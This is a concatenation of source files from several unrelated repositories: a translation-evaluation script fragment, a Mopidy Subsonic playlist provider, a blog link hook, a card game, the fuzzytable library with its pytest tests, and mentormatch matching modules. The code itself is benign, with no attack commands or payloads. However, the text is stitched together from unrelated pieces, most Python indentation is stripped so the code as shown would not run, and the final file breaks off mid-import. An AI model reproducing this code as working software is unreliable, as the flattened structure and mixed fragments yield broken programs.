g.set_yticklabels(g.get_ymajorticklabels(), fontsize=12)
if args.output_file is not None:
plt.savefig(os.path.join(os.path.dirname(args.output_file),
'heatmap_{}'.format(batch_idx * batch_size + i)))
plt.show()
# remove end token if present
if tgt_tokens[-1] in [special_tokens['bos_token'], special_tokens['eos_token']]:
tgt_tokens = tgt_tokens[:-1]
if args.replace_qp:
tgt_lang = args.tgt_lang if args.tgt_lang else args.model_name_or_path.rsplit('-', 1)[1]
text, is_replaced = replace_quoted_params(src_tokens, tgt_tokens, tokenizer, sample_layer_attention_pooled, args.model_type, tgt_lang)
if not is_replaced and args.force_replace_qp:
text = force_replace_quoted_params(src_tokens, tgt_tokens, tokenizer, sample_layer_attention_pooled, args.model_type)
else:
text = tokenizer.convert_tokens_to_string(tgt_tokens)
else:
text = tokenizer.decode(out_cropped, clean_up_tokenization_spaces=False, skip_special_tokens=True)
            text = re.sub(r'\s\s+', ' ', text)  # remove duplicate whitespace
text = text.strip()
text = tokenize_cjk_chars(text)
if not args.skip_heuristics:
text = output_heuristics(text, batch_reverse_maps[sample_index])
batch_outputs[sample_index].append(text)
all_outputs.extend(batch_outputs)
if batch_idx == 0 and args.verbose:
logger.info('First batch output: %s', str(all_outputs))
batch_idx += 1
# sort the results back to their original order
_, all_outputs = tuple(zip(*sorted(list(zip(original_order, all_outputs)))))
if args.output_file is not None:
with open(args.output_file, 'w') as output_file:
for i, output in enumerate(all_outputs):
for j, text in enumerate(output):
# if num_samples is 1 keep the original id
if len(output) == 1:
id_ = all_example_ids[i]
else:
id_ = '{}-{}'.format(all_example_ids[i], j)
if args.output_example_ids_too:
output_file.write('\t'.join([id_, text]) + '\n')
else:
output_file.write(text + '\n')
else:
print(json.dumps(all_outputs, indent=2))
metrics = compute_metrics(all_outputs, all_golds, reduction=args.metric_reduction)
logger.info('Average BLEU score = %.2f', metrics['bleu'])
logger.info('Exact match score = %.2f', metrics['em'])
``` |
{
"source": "jonathanchristison/mopidy-subsonic",
"score": 2
} |
#### File: mopidy-subsonic/mopidy_subsonic/playlist.py
```python
from __future__ import unicode_literals
import logging
from mopidy import backend
from mopidy.models import Playlist, Ref
logger = logging.getLogger(__name__)
class SubsonicPlaylistsProvider(backend.PlaylistsProvider):
def __init__(self, *args, **kwargs):
super(SubsonicPlaylistsProvider, self).__init__(*args, **kwargs)
self.remote = self.backend.remote
self.playlists = self._get_playlists()
def lookup(self, uri):
logger.debug('Playlist lookup. uri = %s' % uri)
id = uri.split("subsonic:playlist:")[1]
try:
id = int(id)
return self.remote.playlist_id_to_playlist(id)
        except Exception:
return self.remote.get_smart_playlist(id)
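        # e.g. 'subsonic:playlist:42' resolves a stored playlist by numeric id,
        # while 'subsonic:playlist:random' falls through to a smart playlist.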
def playlist_to_ref(self, playlist):
return Ref(
uri=playlist.uri,
name=playlist.name,
type=Ref.PLAYLIST
)
def track_to_ref(self, track):
return Ref(
uri=track.uri,
name=track.name,
type=Ref.TRACK
)
def as_list(self):
playlists = self._get_playlists()
return [self.playlist_to_ref(playlist) for playlist in playlists]
def get_items(self, uri):
playlist = self.lookup(uri)
return [self.track_to_ref(track) for track in playlist.tracks]
def _get_playlists(self):
smart_playlists = {'random': 'Random Albums',
'newest': 'Recently Added',
'highest': 'Top Rated',
'frequent': 'Most Played',
'recent': 'Recently Played',
'randomsongs': 'Random Songs'}
playlists = self.remote.get_user_playlists()
for type in smart_playlists.keys():
playlists.append(
Playlist(
uri=u'subsonic:playlist:%s' % type,
name='Smart Playlist: %s' % smart_playlists[type]))
return playlists
``` |
{
"source": "jonathanchu/jontourage",
"score": 2
} |
#### File: jontourage/_hooks/links.py
```python
class Link(object):
def __init__(self, name, url):
self.name = name
self.url = url
projects = [ Link('growl', 'https://github.com/xfire/growl/tree'),
Link('pydzen', 'https://github.com/xfire/pydzen/tree'),
Link('python-wmii', 'https://github.com/xfire/python-wmii/tree'),
Link('preplace', 'https://github.com/xfire/preplace/tree'),
Link('jitertools', 'https://github.com/xfire/jitertools/tree'),
Link('mailfilter', 'http://projects.spamt.net/mailfilter/'),
]
links = [ Link('github', 'http://github.com/xfire/'),
Link('dotfiles', 'https://github.com/xfire/dotfiles/tree'),
Link("copton's blog", 'http://blog.copton.net/'),
Link("copton's ethz blog", 'http://blogs.ethz.ch/copton/'),
Link("schula's blog", 'http://blog.spamt.net/'),
Link("freaky's blog", 'http://www.freakysoft.de/blog/'),
]
updates = AttrDict(projects = projects, links = links)
if 'site' not in Site.CONTEXT:
Site.CONTEXT.site = updates
else:
Site.CONTEXT.site.update(updates)
``` |
{
"source": "jonathanchukinas/card_game",
"score": 4
} |
#### File: card_game/card_game/cards.py
```python
import collections
import random
import functools
@functools.total_ordering
class Card(collections.namedtuple('CardTuple', 'rank suit ranks suits')):
"""
Card objects represent a single playing card.
Compares to other Card objects. All arguments should be lower case.
Capitalization is handled by repr and str dunder method. ranks and
suits arguments should be sorted in ascending value.
:param rank: string - card number or face value (e.g. '9' or 'jack')
:param suit: string - card suit (e.g. 'diamonds' or 'clubs')
:param ranks: list of strings - all avail card number and face values
:param suits: list of strings - all avail card deck suits.
"""
@property
def indices(self):
"""
:return: tuple integers, representing the value of this card
"""
return self.ranks.index(self.rank), self.suits.index(self.suit)
def __lt__(self, other):
return self.indices < other.indices
def __eq__(self, other):
return self.indices == other.indices
def __repr__(self):
return f'Card({self.rank[0]}, {self.suit[0]})'
def __str__(self):
if self.rank[0] == 'p':
return 'Penalty Card!'
return f'{self.rank.title()} of {self.suit.title()}'
class CardDeck:
"""
CardDeck objects represent a deck of Card objects.
Choose shuffled or unshuffled.
"""
def __init__(self, shuffle=True):
ranks, suits = self.ranks_and_suits
self.cards = [
Card(rank, suit, ranks, suits)
for rank in ranks
for suit in suits
]
if shuffle:
random.shuffle(self) # in-place shuffle
@property
def ranks_and_suits(self):
"""
Tuples of lists: ranks and suits, each listed in ascending value.
"""
ranks = 'penalty jack queen king ace'.split()
ranks[1:1] = [str(val) for val in range(2, 11)] # insert after penalty
suits = 'clubs diamonds hearts spades'.split()
return ranks, suits
def draw_card(self):
"""
Remove and return the top card from the deck.
:return: Card object
"""
return self.cards.pop()
def __len__(self):
return len(self.cards)
def __getitem__(self, item):
return self.cards[item]
def __setitem__(self, key, value):
self.cards[key] = value
if __name__ == '__main__':
help(Card)
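    # A minimal usage sketch (not part of the original file):
    #   deck = CardDeck()        # 56 shuffled cards (14 ranks x 4 suits, incl. penalty)
    #   card = deck.draw_card()
    #   print(card)              # e.g. 'Queen of Hearts'
    #   print(len(deck))         # 55 cards remain after one draw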
```
#### File: card_game/card_game/game.py
```python
import click
import operator
from card_game.cards import CardDeck
from card_game.player import Player
from card_game.print_utils import indent, print_header, print_scoreboard
class Game:
"""
This class controls the flow of the game.
Instantiates 2-4 Player objects, then executes the game, one round at
a time. Each round, a shuffled card deck is generated, and a card drawn
    for each player. The Player objects check for round winners and hold
    state for their current card and win/loss record. Rounds are played
    until the Game object finds a game winner.
"""
def __init__(self, players, manual_draw=False, pause_at_round_end=False):
"""
:param players: either an integer (player count), or a list of
strings (of player names).
:param manual_draw: if True, game waits for user input for each
card draw.
:param pause_at_round_end: if True, game waits for user input at
the end of each round.
"""
if isinstance(players, int):
self.players = [Player(player_index) for player_index in range(players)]
self.players_have_names = False
elif isinstance(players, list):
self.players = [
Player(player_number, player_name)
for player_number, player_name in enumerate(players)
]
self.players_have_names = True
else:
raise TypeError
self._manual_draw = manual_draw
self._round_end_pause = pause_at_round_end
def play(self):
"""
Play a series of rounds until a winner emerges.
:return: None
"""
round_number = 0
winner = None
while not winner:
round_number += 1
winner = self.play_a_round(round_number)
print_header('game end')
click.secho(f'\n{winner} wins the game! Well done!!!', fg='green', bold=True)
def play_a_round(self, round_number):
"""
Play a single round.
Print round number as header. Generate shuffled deck. Call card
draw method for each player. Player objects evaluate and store
        their win or loss. Print each win or loss. Print scoreboard.
:param round_number: int. Ensures the round header and scoreboard
print correctly.
:return: Player object (game winner) if game end; else None. This
is used by the play method to bring the game to an end.
"""
# --- get a shuffled deck ---------------------------------------------
deck = CardDeck()
round_header = f'round {round_number}'
print_header(round_header)
click.echo(f'\nThe deck has been shuffled. Here we go!')
# --- draw cards ------------------------------------------------------
for player in self.players:
self.draw_card(player, deck)
# --- assign points ---------------------------------------------------
cards = [player.card for player in self.players]
for player in self.players:
player.determine_round_status(cards)
# --- print round summary ---------------------------------------------
click.echo()
for player in self.players:
player.print_round_summary()
print_scoreboard(round_number, self.players, self.players_have_names)
# -- Pause after each round -------------------------------------------
winner = self.check_for_winner()
if not winner and self._round_end_pause:
click.echo()
click.pause()
return winner
def draw_card(self, player, deck):
"""
Draw a card for a single player
Depending on Game instance arguments, wait for user input. Print
player info and card drawn.
:param player: Player object
:param deck: Deck object
:return: None
"""
if self._manual_draw:
click.pause(info=f"\n{player}, press any key to draw a card...")
else:
click.echo(f'\n{player} draws...')
player.card = deck.draw_card()
click.echo(indent(player.card))
def check_for_winner(self):
"""
        Check for a game winner.
        :return: Player object (the winner) if game end; else None
"""
players = sorted(self.players, key=operator.attrgetter('score')) # players sorted by score
if players[-1].score >= 21 and players[-1].score - players[-2].score >= 2:
return players[-1]
else:
return None
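        # e.g. scores [21, 20] -> no winner yet (lead < 2); scores [22, 20] -> winner.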
if __name__ == "__main__":
help(Game)
```
#### File: card_game/card_game/player.py
```python
import collections
import functools
import click
class Player:
"""
Objects of this class represent a single game player.
Stores the player's index, name, latest card and win/loss record
through the game. Has methods for determining round winner/loser and
for calculating score for current or any round.
"""
def __init__(self, index, name=None):
"""
:param index: int - zero-indexed number
:param name: str - optional player name
"""
self.index = index
self.name = name
self.card = None
self._results = []
@property
def number(self):
"""Player's unique number for printing purposes"""
return self.index + 1
@staticmethod
def points_earned(status):
"""Return dictionary of values for winning/losing a round."""
points = {'w': 2, 'n': 0, 'p': -1}
return points[status]
@property
def str_points_earned_this_round(self):
"""
Return string - points earned in latest round.
Used by scoreboard at end of round.
String is prepended with '-' or '+'.
"""
pts = self.points_earned(self.round_status)
pts = str(pts)
if len(pts) == 1:
pts = '+' + pts
return pts # self.points_earned(self.round_status)
@property
def round_status(self):
"""Return str - single character representing the win/loss status
of latest round."""
return self._results[-1]
@functools.lru_cache()
def get_score(self, round_num):
"""Return int - cummulative score for a given round number."""
if round_num == 0:
return 0
else:
result = self._results[round_num - 1] # round_status from this round_num
points = self.points_earned(result) # points gained or lost this round_num
return max(0, self.get_score(round_num - 1) + points) # return score
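    # e.g. results ['w', 'p', 'p'] score as 2, then 1, then 0 (the score never drops below 0).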
@property
def score(self):
"""Return int - cummulative score as of latest round."""
round_num = len(self._results)
return self.get_score(round_num)
def determine_round_status(self, all_cards_from_this_round):
"""
Determine player's win/loss status this round
Win, penalty, or neutral
"""
if self.card.rank[0] == 'p':
self._results.append('p') # penalty
elif self.card == sorted(all_cards_from_this_round)[-1]:
            self._results.append('w')  # winner
else:
self._results.append('n') # n/a
def print_round_summary(self):
"""Print player's win/neutral/penalty status this round"""
RoundSummary = collections.namedtuple("RoundSummary", 'txt color bold')
round_summaries = {
'w': RoundSummary(f'{self} wins the round!', 'green', True),
'n': RoundSummary(f'{self} gains no points', None, False),
'p': RoundSummary(f'{self} is penalized!', 'red', True),
}
rs = round_summaries[self.round_status]
click.secho(rs.txt, fg=rs.color, bold=rs.bold)
def __repr__(self):
if self.name is None:
return f"Player {self.number}"
return f"Player {self.number} ({self.name})"
``` |
{
"source": "jonathanchukinas/fuzzytable",
"score": 4
} |
#### File: fuzzytable/datamodel/fields.py
```python
from typing import Optional, List, Iterable
from abc import ABC, abstractmethod
# --- Intra-Package Imports ---------------------------------------------------
from fuzzytable.main.utils import get_repr
# --- Third Party Imports -----------------------------------------------------
# None
class Field(ABC):
"""
Shared attributes/methods:
header
col_num
name
matched
data
ratio
__getitem__
__len__
"""
pass
class SingleField(Field):
"""
Represents a single column of your table.
A single FuzzyTable object will have several SingleField objects, stored as a list in ``FuzzyTable.field_names``.
SingleField objects are the source of truth for table contents.
Remove a field from ``FuzzyTable.field_names`` and it disappears from the ``FuzzyTable`` and ``FuzzyTable.records`` views as well.
>>> import fuzzytable
>>> ft = fuzzytable.FuzzyTable('birthdays.csv')
>>> first_name = ft.field_names[0]
>>> first_name.col_num
1
>>> first_name.data
['John', 'Typhoid', 'Jane']
>>> str(first_name)
"<SingleField 'first_name' 0x10dcce8>"
Attributes:
name: return ``str``, the unique identifier for this field. Matches the field name you passed to FuzzyTable. Otherwise, return ``header``.
data: return list of cell values.
header: return ``str``, the value from the header cell. This may differ from ``name`` if fuzzy matching was specified.
col_num: return ``int``, column number, 1-indexed. For example, a field extracted from column B has a col_num of 2.
matched: return ``bool``. True if this field matches a field name passed to the FuzzyTable constructor.
"""
def __init__(
self,
header: str,
col_num: int,
) -> None:
super().__init__()
# populated during init
self.header = header
self.col_num = col_num
# populated during match with FieldPattern
self._name = None
self.matched = False
self.data = None
self.ratio = None
self.cellpattern = None
# populated during later step after all matching is done
@property
def name(self):
if self._name is None:
return self.header
else:
return self._name
@name.setter
def name(self, value):
self._name = value
def __repr__(self):
return get_repr(self) # pragma: no cover
def __getitem__(self, item):
return self.data[item]
def __len__(self):
return len(self.data)
class MultiField(Field):
"""
Represents one or more columns of your table.
"""
def __init__(self, name, fields: List[SingleField]) -> None:
super().__init__()
self.name = name
self.subfields = list(sorted(fields, key=lambda f: f.col_num))
# self._len = len(subfields)
# self._header_row = header_row
# self._row_count = row_count
self.matched = True
self.cellpattern = None
@property
def header(self):
return tuple(field.header for field in self.subfields)
@property
def data(self):
return [
self[i]
for i in range(len(self))
]
@property
def ratio(self):
# return minimum ratio of all subfields
return min(field.ratio for field in self.subfields)
def __len__(self):
return len(self.subfields[0])
def __getitem__(self, item):
return tuple(
field.data[item]
for field in self.subfields
)
@property
def col_nums(self):
return [field.col_num for field in self.subfields]
@property
def col_num(self):
return self.col_nums[0]
@property
def col_num_last(self):
return self.col_nums[-1]
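# A rough sketch of MultiField indexing (hypothetical subfields, not from the original file):
#   full_name = MultiField('full_name', [first_name_field, last_name_field])
#   full_name[0]  ->  ('John', 'Smith')   # one tuple per row, one entry per subfield column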
class RowField(SingleField):
def __init__(self, header_row_num, sheet_row_count):
super().__init__(
header='row',
col_num=-1,
)
self.data = range(header_row_num + 1, sheet_row_count + 1)
if __name__ == '__main__':
pass
```
#### File: fuzzytable/datamodel/sheet.py
```python
class Sheet:
"""
Container for sheet metadata, e.g. path, header row number, number of rows, etc
>>> import fuzzytable
>>> ft = fuzzytable.FuzzyTable('birthdays.csv')
>>> ft.sheet.header_row_num
1
>>> ft.sheet.header_ratio
0.0
>>> ft.sheet.row_count
4
>>> ft.sheet.path
WindowsPath('birthdays.csv')
>>> ft.sheet.sheetname
None
Attributes:
header_row_num: ``int`` row number, 1-indexed.
header_ratio: ``float`` percent match between desired field names and the found headers. ``0.0`` if no field names were specified.
row_count: ``int`` total number of rows in the worksheet.
path: ``pathlib.Path`` object. ``str(path)`` to convert to string.
sheetname: ``str`` name of worksheet if excel.
"""
def __init__(self, header_row_num, row_count, ratio, path, sheetname):
self.header_row_num = header_row_num
self.header_ratio = ratio
self.row_count = row_count
self.path = path
self.sheetname = sheetname
# def __repr__(self):
# return get_repr(self) # pragma: no cover
```
#### File: tests/experiments/gen.py
```python
def numgen(last_num):
num = 1
going = True
while going:
yield num
num += 1
if num > last_num:
going = False
for num in numgen(3):
print(num)
def numgen2(last_num):
num = 1
while True:
yield num
num += 1
if num > last_num:
return
for num in numgen2(3):
print(num)
```
#### File: tests/experiments/graveyard.py
```python
class Something:
def __init__(self, stuff):
self.hello = stuff
allthings = [Something(i) for i in range(5)]
many = lambda x: x.hello >= 3
manythings = filter(many, allthings)
for thing in manythings:
print(thing.hello)
```
#### File: fuzzytable/tests/test_4_data_model.py
```python
import pytest
from tests.conftest import get_dr_who_records
@pytest.mark.simple
# 1 #####
def test4_1_second_record_equality(ft_dr_who_all_fields, dr_who_records):
# GIVEN a sheet containing the following record...
expected_second_record = dr_who_records[1]
# WHEN user successfully extracts all field_names from the sheet...
ft = ft_dr_who_all_fields
ft.records.include_row_num = False
actual_second_record = ft.records[1]
# THEN ft.records and the expected dictionary compare equal.
assert actual_second_record == expected_second_record
@pytest.mark.parametrize("records_equal", [
(get_dr_who_records(), True),
(get_dr_who_records()[0:1], False),
(list(range(3)), False),
])
@pytest.mark.parametrize("convert_to_dict_list", [
True,
False
])
# 2 #####
def test4_2_records_equality(ft_dr_who_all_fields, records_equal, convert_to_dict_list):
# GIVEN a sheet containing the following table...
expected_records, compare_equal = records_equal
# WHEN user successfully extracts all field_names from the sheet...
ft = ft_dr_who_all_fields
ft.records.include_row_num = False
# ft.records.include_row_num = False
actual_records = ft.records
if convert_to_dict_list:
actual_records = [
dict(record)
for record in actual_records
]
# THEN ft.records and the expected dictionary compare equal.
if compare_equal:
assert actual_records == expected_records
else:
assert actual_records != expected_records
# 3 #####
def test4_3_fields_dict_equality(ft_dr_who_all_fields, dr_who_fields):
# GIVEN a sheet containing the following table...
expected_dict = dr_who_fields
ft = ft_dr_who_all_fields
ft.records.include_row_num = False
# WHEN user casts fuzzy table to dict...
actual_dict = dict(ft)
# THEN ft.records and the expected dictionary compare equal.
assert actual_dict == expected_dict
# assert list(ft.items()) == dr_who_fields.items()
# OTHER
for field in ft.fields:
str(field)
print(ft.records.include_row_num)
# 4 #####
def test4_4_records_rows(ft_dr_who_all_fields, dr_who_fields):
# GIVEN a table with headers in row 4...
expected_rows = list(range(5, 8))
# WHEN user accesses records via get_records:
ft = ft_dr_who_all_fields
actual_rows = [
record['row']
for record in ft.records
]
# THEN the records have the correct row numbers
assert actual_rows == expected_rows
# 5 #####
def test4_5_records_missing_field(ft_dr_who_some_fields, dr_who_records):
# GIVEN a sheet containing the following table...
expected_records = dr_who_records
# WHEN user extracts only some field_names...
ft = ft_dr_who_some_fields
actual_records = ft.records
# THEN ft.records and the expected dictionary compare equal.
assert actual_records != expected_records
assert actual_records != [{'a': 1, 'b': 2}]*3
# 6 #####
def test4_6_fuzzytable_keysvaluesitems(ft_dr_who_all_fields, dr_who_fields):
# GIVEN a table...
expected_fields = dr_who_fields
# WHEN user extracts the table with fuzzy table...
# expected_rows = list(range(5, 8))
ft = ft_dr_who_all_fields
    # THEN the fuzzy table behaves like a dictionary
assert list(ft.keys()) == list(expected_fields.keys())
assert list(ft.values()) == list(expected_fields.values())
for (ft_keys, ft_values), (exp_keys, exp_values) in zip(ft.items(), expected_fields.items()):
assert ft_keys == exp_keys
assert ft_values == exp_values
# 7 #####
def test4_7_fuzzyrecords_len(ft_dr_who_all_fields, dr_who_records):
# GIVEN a table...
expected_records = dr_who_records
expected_record_count = len(expected_records)
# WHEN user inspects records length
ft = ft_dr_who_all_fields
actual_record_count = len(ft.records)
    # THEN the record count matches the expected count
assert actual_record_count == expected_record_count
```
#### File: fuzzytable/tests/test_6_patterns.py
```python
from fuzzytable.patterns import FieldPattern
### 1 ###
def test_fieldpattern_repr():
field_pattern = FieldPattern('the name')
representation = repr(field_pattern)
print(representation)
```
#### File: fuzzytable/tests/test_v012_cellpatterns.py
```python
import pytest
from tests import v012_params as p
from fuzzytable import FuzzyTable, FieldPattern, exceptions, cellpatterns
@pytest.mark.parametrize('fields,expected_values,csv_or_excel', [
pytest.param(p.def_fields, p.def_csv_expected_values, '.csv', id='default cellpatterns'),
pytest.param(p.def_fields, p.def_excel_expected_values, '.xlsx', id='default cellpatterns'),
pytest.param(p.int_fields, p.int_expected_values, '', id='integer'),
pytest.param(p.str_fields, p.str_expected_values, '', id='string'),
pytest.param(p.str_field_instantiated, p.str_expected_values, '.csv', id='string (instantiated)'),
pytest.param(p.intlist_fields, p.intlist_expected_values, '', id='integerlist'),
pytest.param(p.float_fields, p.float_expected_values, '', id='float'),
pytest.param(p.wordlist_fields, p.wordlist_expected_values, '', id='wordlist'),
pytest.param(p.bool_fields, p.bool_expected_values, '', id='boolean'),
pytest.param(p.digit_fields, p.digit_expected_values, '', id='digit'),
pytest.param(p.stringchoice_fields, p.stringchoice_expected_values, '', id='choice'),
pytest.param(p.stringchoice_dict_fields, p.stringchoice_dict_expected_values, '', id='choice/dict'),
pytest.param(p.stringchoice_dict_usekeys_fields, p.stringchoice_dict_expected_values, '', id='choice/dict/keys'),
pytest.param(p.stringchoice_approx_fields, p.stringchoice_approx_expected_values, '', id='choice/approx'),
pytest.param(p.stringchoice_exact_fields, p.stringchoice_exact_expected_values, '', id='choice/exact'),
pytest.param(p.stringchoicemulti_fields, p.stringchoicemulti_expected_values, '', id='stringchoicemulti'),
pytest.param(p.customwordlist_fields, p.customwordlist_expected_values, '', id='customwordlist'),
])
@pytest.mark.parametrize('filename,kwargs', [
pytest.param('test.xlsx', {'sheetname': 'data_pattern'}, id='excel'),
pytest.param('data_pattern.csv', {}, id='csv'),
])
# 012/1 #####
def test_12_1_cellpatterns(test_files_dir, fields, expected_values, filename, kwargs, csv_or_excel):
# evaluate csv- or excel-only tests:
if csv_or_excel not in filename:
pytest.skip(f"This is a {csv_or_excel}-only test")
path = test_files_dir / filename
ft = FuzzyTable(
path=path,
fields=fields,
**kwargs,
)
actual_values = ft['values']
# for value in values:
# if not isinstance(value, str):
# assert False
assert actual_values == expected_values
@pytest.mark.parametrize('fieldpattern_kwargs,exception', [
pytest.param({
'name': 'doesnotmatter',
'cellpattern': 'This is not a cellpattern'
},
exceptions.CellPatternError,
id='CellPatternError'
),
pytest.param({
'name': 'doesnotmatter',
'cellpattern': cellpatterns.StringChoice
},
exceptions.UninstantiatededCellPatternError,
id='UninstantiatededCellPatternError'
),
])
# 012/2 #####
def test_cellpatternerror(fieldpattern_kwargs, exception):
with pytest.raises(exception):
FieldPattern(**fieldpattern_kwargs)
# 012/3 #####
def test_modeerror():
with pytest.raises(exceptions.ModeError):
cellpatterns.StringChoice(
mode='thisisnotavalidoption',
contains_match=False,
choices='does not matter what I put here'.split()
)
``` |
{
"source": "jonathanchukinas/mentormatch",
"score": 3
} |
#### File: api/applicant/applicant_collection.py
```python
from __future__ import annotations
from typing import TYPE_CHECKING, Iterable
if TYPE_CHECKING:
from .applicant_factory import ApplicantFactory
from .applicant_abc import Applicant
class ApplicantCollection(Iterable):
def __init__(self, applicant_dicts, applicant_factory: ApplicantFactory):
self._applicant_dicts = applicant_dicts
self._applicant_factory = applicant_factory
self._applicants = None
self._wwid_dict = None
def assemble_applicant_objects(self) -> None:
self._applicants = [
self._applicant_factory.build_applicant(applicant_dict)
for applicant_dict in self._applicant_dicts
]
self._wwid_dict = {
applicant.wwid: applicant
for applicant in self._applicants
}
def __iter__(self):
yield from self._applicants
def get_applicants_by_wwid(self, wwids: Iterable[int]) -> Iterable[Applicant]:
return filter(None, (self._wwid_dict.get(wwid, None) for wwid in wwids))
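        # e.g. wwids (101, 999) yields only the applicants whose wwid is known;
        # unknown ids are silently dropped by filter(None, ...).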
```
#### File: api/applicant/applicant_implementation_mentor.py
```python
from __future__ import annotations
from mentormatch.api.applicant.applicant_abc import Applicant
from mentormatch.utils import ApplicantType
from typing import TYPE_CHECKING, Dict
if TYPE_CHECKING:
from mentormatch.api.sorter.sorter_abc import Sorter
class Mentor(Applicant):
applicant_type = ApplicantType.MENTOR
def __init__(self, applicant_dict: Dict, sorter: Sorter):
super().__init__(
applicant_dict=applicant_dict,
sorter=sorter,
)
self.max_pair_count = int(applicant_dict['max_mentee_count'])
```
#### File: api/sorter/sorter_aggregator.py
```python
from typing import List
from mentormatch.api.pair.pair import Pair
from .sorter_abc import Sorter
from .util import BetterPair, WeightedSorter, pairs_equal, calc_better_pair, PairAndValue, MinMax
from collections import defaultdict
class SorterAggregatorFavor(Sorter):
# Evaluate each sub-sorter until a best pair is found.
# The position of the mentee favor evaluation is dynamically determined by
# the restart count of both mentees.
def __init__(
self,
sorters: List[Sorter],
sorter_favor: Sorter,
sorter_favor_min_position: int,
):
self._sorters = sorters
self._sorter_favor = sorter_favor
self._min_favored_position = sorter_favor_min_position
def get_better_pair(self, pair1: Pair, pair2: Pair) -> BetterPair:
favor_index = self._calc_favor_position(pair1, pair2)
sorters = list(self._sorters)
sorters.insert(favor_index, self._sorter_favor)
for sorter in sorters:
better_pair = sorter.get_better_pair(pair1, pair2)
if isinstance(better_pair, Pair):
return better_pair
return pairs_equal # pragma: no cover
def _calc_favor_position(self, pair1: Pair, pair2: Pair):
mentee1 = pair1.mentee
mentee2 = pair2.mentee
restart_count = max(mentee1.restart_count, mentee2.restart_count)
max_pair_ranker_index = len(self._sorters) - 1
pair_ranker_favor_index = max_pair_ranker_index - restart_count
favor_index = max(pair_ranker_favor_index, self._min_favored_position)
return favor_index
class SorterAggregatorWeighted(Sorter):
# Evaluate all sub-sorters and determine better pair according to the
# weight assigned to each sub-sorter.
def __init__(self, weighted_sorters: List[WeightedSorter]):
self._weighted_sorters = weighted_sorters
def get_better_pair(self, pair1: Pair, pair2: Pair) -> BetterPair:
scores = defaultdict(int)
for weighted_sorter in self._weighted_sorters:
sorter = weighted_sorter.pair_ranker
weight = weighted_sorter.weight
better_pair = sorter.get_better_pair(pair1, pair2)
if isinstance(better_pair, Pair):
scores[better_pair] += weight
return calc_better_pair(
pair1=PairAndValue(pair1, scores[pair1]),
pair2=PairAndValue(pair2, scores[pair2]),
mode=MinMax.MAX,
)
```
#### File: api/sorter/sorter_context_mgr.py
```python
from mentormatch.api.pair.pair import Pair
from .util import BetterPair
from .sorter_abc import Sorter
class SorterContextMgr(Sorter):
def __init__(self, initial_sorter: Sorter, match_sorter: Sorter):
self._initial_sorter = initial_sorter
self._match_sorter = match_sorter
self._current_sorter = None
def set_initializing_sort(self):
self._current_sorter = self._initial_sorter
def set_matching_sort(self):
self._current_sorter = self._match_sorter
def get_better_pair(self, pair1: Pair, pair2: Pair) -> BetterPair:
pair_ranker: Sorter = self._current_sorter
return pair_ranker.get_better_pair(pair1, pair2)
```
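A hedged sketch of the strategy switch implemented by `SorterContextMgr`: the two stub sorters and the string "pairs" are illustrative only, and the import path is assumed to mirror the intra-package imports above.
```python
from mentormatch.api.sorter.sorter_context_mgr import SorterContextMgr  # assumed module path
class _AlwaysFirst:
    # Illustrative stand-in for a Sorter that always prefers the first pair.
    def get_better_pair(self, pair1, pair2):
        return pair1
class _AlwaysSecond:
    # Illustrative stand-in for a Sorter that always prefers the second pair.
    def get_better_pair(self, pair1, pair2):
        return pair2
mgr = SorterContextMgr(initial_sorter=_AlwaysFirst(), match_sorter=_AlwaysSecond())
mgr.set_initializing_sort()
assert mgr.get_better_pair('pair_a', 'pair_b') == 'pair_a'
mgr.set_matching_sort()
assert mgr.get_better_pair('pair_a', 'pair_b') == 'pair_b'
```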
#### File: api/summarize/summarize.py
```python
from __future__ import annotations
from typing import Dict, TYPE_CHECKING
from collections import defaultdict
import pandas as pd
if TYPE_CHECKING:
from mentormatch.api.applicant.applicant_collection import ApplicantCollection
class MatchingSummary:
def __init__(self, mentors: ApplicantCollection, mentees: ApplicantCollection):
self._mentors = mentors
self._mentees = mentees
self.summary_dataframes: Dict[str, pd.DataFrame] = {}
def summarize_all(self) -> None:
self.add_pairs_to_dicts()
dataframes = {
'mentor_utilization': self.get_dataframe_mentor_utilization(),
'favor': self.get_dataframe_favor(),
'pairs': self.get_dataframe_pairs(),
}
self.summary_dataframes.update(dataframes)
def get_dataframe_favor(self) -> pd.DataFrame:
return pd.crosstab(
rownames=['Favor Level'],
index=(mentee.favor for mentee in self._mentees),
colnames=['Is Paired?'],
columns=(mentee.is_paired for mentee in self._mentees),
margins=True,
margins_name='Total'
)
def get_dataframe_mentor_utilization(self) -> pd.DataFrame:
return pd.crosstab(
rownames=['Actual'],
index=(mentor.pair_count for mentor in self._mentors),
colnames=['Max'],
columns=(mentor.max_pair_count for mentor in self._mentors),
margins=True,
margins_name='Total'
)
def get_dataframe_pairs(self) -> pd.DataFrame:
dict_pairs = defaultdict(list)
for mentor in self._mentors:
for pair in mentor.yield_pairs:
mentee = pair.mentee
dict_pairs['mentor_str'].append(str(mentor))
dict_pairs['mentee_str'].append(str(mentee))
dict_pairs['type'].append(pair.pair_type.name)
df = pd.DataFrame(dict_pairs).set_index([
'mentor_str',
'mentee_str'
]).sort_index(level=[0, 1])
return df.reset_index()
def add_pairs_to_dicts(self) -> None:
for applicants_collection in [self._mentors, self._mentees]:
for applicant in applicants_collection:
pairs = list(applicant.yield_pairs)
matches = [
pair.get_applicant(applicant.applicant_type, return_other=True)
for pair in pairs
]
wwids = [match.wwid for match in matches]
match_types = [pair.pair_type.name for pair in pairs]
applicant.application_dict['match_wwids'] = wwids #if wwids else None
applicant.application_dict['match_types'] = match_types # if match_types else None
for mentee in self._mentees:
wwids = mentee.application_dict['match_wwids']
if wwids:
mentee.application_dict['match_wwids'] = int(wwids[0])
```
#### File: mentormatch/exporter/exporter_setup.py
```python
from .exporter_aggregator import ExporterAggregator
from .exporter_abc import Exporter
import mentormatch.exporter.exporter_implementation as exim
from pathlib import Path
class ExporterFactory:
def __init__(self, output_dir: Path):
self._exporter = ExporterAggregator(exporters=[
exim.ExporterTerminal(),
exim.ExporterTxt(output_dir),
exim.ExporterExcel(output_dir),
])
def get_exporter(self) -> Exporter:
return self._exporter
```
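Wiring this up is a one-liner; the sketch below is illustrative only, with a placeholder output directory and the module path assumed from the package layout above.
```python
from pathlib import Path
from mentormatch.exporter.exporter_setup import ExporterFactory  # assumed module path
# The returned object aggregates ExporterTerminal, ExporterTxt and ExporterExcel
# behind the single Exporter interface; 'results' is just an example directory.
exporter = ExporterFactory(output_dir=Path('results')).get_exporter()
```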
#### File: mentormatch/importer/importer_implementation_excel.py
```python
from __future__ import annotations
from fuzzytable import FuzzyTable, exceptions as fe
